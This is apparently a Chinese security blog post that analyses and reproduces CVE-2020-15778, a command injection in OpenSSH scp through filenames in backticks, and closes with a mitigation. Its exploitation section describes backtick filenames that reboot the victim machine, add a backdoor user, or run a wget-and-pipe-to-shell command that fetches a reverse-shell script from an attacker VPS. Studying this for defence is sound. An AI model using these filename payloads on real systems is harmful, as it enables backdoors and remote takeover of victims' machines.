CVE-2020-15778 SSH漏洞复现分析

在众多的工业路由器和部分控制器内，采用了OpenSSH来做外部连接和管理。2020年7月9日被国外安全研究员ChinmayPandya发现OpenSSH 8.3 p1及之前版本中SCP命令里存在命令注入漏洞。

上面为https://github.com/openssh/openssh-portable/blob/master/scp.c的代码，989行则是漏洞触发所在。当将文件复制到远程服务器时，文件路径附加在本地scp命令的末尾。例如，如果执行以下命令：

scp SourceFileuser@host:directory/TargetFile

它将执行一个本地命令：

scp-t directory/TargetFile

在创建本地scp命令时，它没有清理文件名。攻击者可以采用反引号(`)文件作为命令注入。而linux系统是可以接受以反引号(`)为文件命名方式。如果你尝试把payload放在反引号中作为文件名，当调用scp命令时就会触发这个指令的执行。

漏洞利用场景：

攻击者可以采用U盘伪装成设备固件或者某种工具，在U盘中创建深度子目录，某一个目录中一个文件可以命名为`payload`，比如`reboot`。当受害者拷贝U盘目录及文件的时候采用scp -r \文件夹 RemoteIP:\文件夹 这条命令的时候，就会触发受害者的机器重启，同理如果你采用反引号+useradd这样的文件名，就可以直接在受害者机器上开启后门。当然变态一点的红队利用，就是在VPS上假设FTP放入反弹shell脚本，然后利用反引号(`)结合wget http:// vps:port/xxx.sh | sh ./xxx.sh 作为文件名，触发受害者反弹shell到VPS上。

对于远程命令的执行，还是需要bypass authorized_keys，所以远程被利用几率比较小。以下这段PoC视频，只是给大家演示一下，是可以存在远程执行命令的可能性，但是前提是要bypass authorized_keys否则，你还是需要知道

password的。

视频演示：http://mpvideo.qpic.cn/0bf2pyaggaaabeahhgjgcrpva7wdmn7aayya.f10002.mp4?

防护解决方案：

截止到现在openssh的github并没有修补这个漏洞，禁用scp -r 整体目录拷贝方式，采用tar压缩目录为单一文件后，scp上传到远端机器后，再ssh远端机器解压目录。

参考：https://github.com/cpandya2909/CVE-2020-15778